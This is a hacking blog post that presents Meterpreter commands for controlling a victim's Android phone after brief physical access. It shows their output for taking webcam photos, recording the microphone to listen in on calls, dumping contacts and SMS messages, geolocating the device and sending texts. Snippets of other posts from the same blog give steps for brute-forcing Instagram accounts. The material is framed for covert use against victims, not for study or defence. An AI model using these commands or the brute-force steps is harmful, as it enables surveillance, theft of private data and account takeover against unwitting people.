Skip to main content

How to Hack any android device

   How to Hack any Android Device   


Prerequisites:



  • kali perating system
  • internet connection
  • victims mobile phone for 10 seconds

so if you want to know the steps i will update it soon here but till then you can watch the video here and the commands to control the victims mobile phone is below 

HAPPY HACKING !!





pwd:

The pwd command allows you to see the current directory you're in.
meterpreter > pwd
/data/data/com.metasploit.stage

cd:
The cd command allows you to change directory. For example:
meterpreter > cd cache
meterpreter > ls
cat:
The cat command allows you to see the contents of a file.
ls:
The ls command displays items in a directory. For example:
meterpreter > ls
Listing: /data/data/com.metasploit.stage/files
==============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  0     fil   2016-03-08 14:56:08 -0600  rList-com.metasploit.stage.MainActivity
upload:
The upload command allows you to upload a file to the remote target. The -r option allows you to do so recursively.
download:
The download command allows you to download a file from the remote target. The -r option allows you to do so recursively.
search:
The search command allows you to find files on the remote target. For example:
meterpreter > search -d . -f *.txt
ifconfig:
The ifconfig command displays the network interfaces on the remote machine.
meterpreter > ifconfig

...

Interface 10
============
Name         : wlan0 - wlan0
Hardware MAC : 60:f1:89:07:c2:7e
IPv4 Address : 192.168.1.207
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : fe80::62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954
IPv6 Netmask : ::

...
getuid
The getuid command shows the current user that the payload is running as:
meterpreter > getuid
Server username: u0_a231
ps
The ps command shows a list of processes the Android device is running. For example:
meterpreter > ps 

Process List
============

 PID    Name                                                         Arch  User
 ---    ----                                                         ----  ----
 1      /init                                                              root
 2      kthreadd                                                           root
 3      ksoftirqd/0                                                        root
 7      migration/0                                                        root
 8      rcu_preempt                                                        root
 9      rcu_bh                                                             root
 10     rcu_sched                                                          root
 11     watchdog/0                                                         root
 12     watchdog/1                                                         root
 13     migration/1                                                        root
 14     ksoftirqd/1                                                        root
 17     watchdog/2                                                         root
 18     migration/2                                                        root
 19     ksoftirqd/2                                                        root
 22     watchdog/3                                                         root
 23     migration/3                                                        root

...
shell
The shell command allows you to interact with a shell:
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0
To get back to the Meterpreter prompt, you can do: [CTRL]+[Z]
sysinfo
The sysinfo command shows you basic information about the Android device.
meterpreter > sysinfo
Computer    : localhost
OS          : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Meterpreter : java/android
webcam_list
The webcam_list command shows a list of webcams you could use for the webcam_snap command. Example:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
webcam_snap
The webcam_snap command takes a picture from the device. You will have to use the webcam_list command to figure out which camera to use. Example:
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
record_mic
The record_mic command records audio. Good for listening to a phone conversation, as well as other uses. Example:
meterpreter > record_mic -d 20
[*] Starting...
[*] Stopped
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
activity_start
The activity_start command is an execute command by starting an Android activity from a URI string.
check_root
The check_root command detects whether your payload is running as root or not. Example:
meterpreter > check_root
[*] Device is not rooted
dump_calllog
The dump_calllog command retrieves the call log from the Android device.
dump_contacts
meterpreter > dump_contacts
[*] Fetching 5 contacts into list
[*] Contacts list saved to: contacts_dump_20160308155744.txt
geolocate
The geolocate commands allows you to locate the phone by retrieving the current lat-long using geolocation.
wlan_geolocate
The wlan_geolocation command allows you to locate the phone by retrieving the current lat-long using WLAN information. Example:
meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
[*] Google Maps URL:  https://maps.google.com/?q=30.*******,-97.*******
send_sms
The send_sms command allows you to send an SMS message. Keep in mind the phone will keep a copy of it, too.
meterpreter > send_sms -d "2674554859" -t "hello"
[+] SMS sent - Transmission successful
sms_dump
The sms_dump command allows you to retrieve SMS messages. And save them as a text file. For example:
meterpreter > dump_sms
[*] Fetching 4 sms messages
[*] SMS messages saved to: sms_dump_20160308163212.txt

...

$ cat sms_dump_20160308163212.txt

=====================
[+] SMS messages dump
=====================

Date: 2016-03-08 15:30:12 -0600
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Remote IP: 192.168.1.207
Remote Port: 59130

#1
Type : Incoming
Date : 2016-03-08 15:29:32
Address : **********
Status : NOT_RECEIVED
Message : Hello world

...

run
The run command allows you to run a post module against the remote machine at the Meterpreter prompt. For example:
meterpreter > run post/android/capture/screen 

Comments

Popular posts from this blog

Is it worth buying Gautam Kumawat Hacking course

   Is it Worth buying Gautam Kumawat Course    so if you just want answer then i must say no, it is never worth it, if you want to know the reason keep reading. so i am talking here about the course of Gautam Kumawat his ads is currently running on different social media including youtube. Ad showing to join the free webinar on hacking. So when you join the webinar first he introduce himself in the way that you started thinking that he is a great  hacker by introducing his achievements and news articles and many more things. But let me tell you that these things is not very big for a skilled hacker, absolutely he is a great hacker but  we are here to talk about his course.  So after the introduction to the basic hacking and on how and what to learn on hacking he will ask you is you will be able to learn all these things within 45 days. Let me tell you that hacking is so vast that no one will be able to teach you complete hacking in jus...

Instagram Automation

Instagram Automation from selenium import webdriver import time class Instabot: def __init__ ( self , username , password): self .username = username self .password = password self .driver = webdriver.Chrome() self .driver.get( "http://www.instagram.com" ) self .driver.implicitly_wait( 5 ) self .driver.find_element_by_name( "username" ).send_keys(username) self .driver.find_element_by_name( "password" ).send_keys(password) self .driver.find_element_by_xpath( '//*[@id="react-root"]/section/main/article/div[2]/div[1]/div/form/div[4]/button/div' ).click() self .driver.implicitly_wait( 5 ) self .driver.find_element_by_xpath( '/html/body/div[4]/div/div/div[3]/button[2]' ).click() self .driver.get( "https://www.instagram.com" + "/explore/people/" ) dimension = self .driver.get_window_size() ...

Hacking Instagram Using Bruteforce

Hacking Instagram Using Bruteforce Attack so today we will see how can we hack into anyone instagram account so before starting let me tell you that you can also watch video on the same by clicking here on youtube  there everything is explained same as here so lets start. Requirements: PC or Laptop Internet connection kali os or virtual kali a victim in which you will perform hack Steps: first we will open our kali machines terminal and check if you are root or not by typing whoami if it says root then you don't have to follow next step type sudo su and after pressing enter type the password of your kali machine after this type apt-get install tor After the installation complete go to this link  and click on clone or download and copy the text Return to your terminal again and type git clone and then paste the text you just copied After that give time for downloading and when it completes type chmod +x install.sh After this type chmod +x instashell....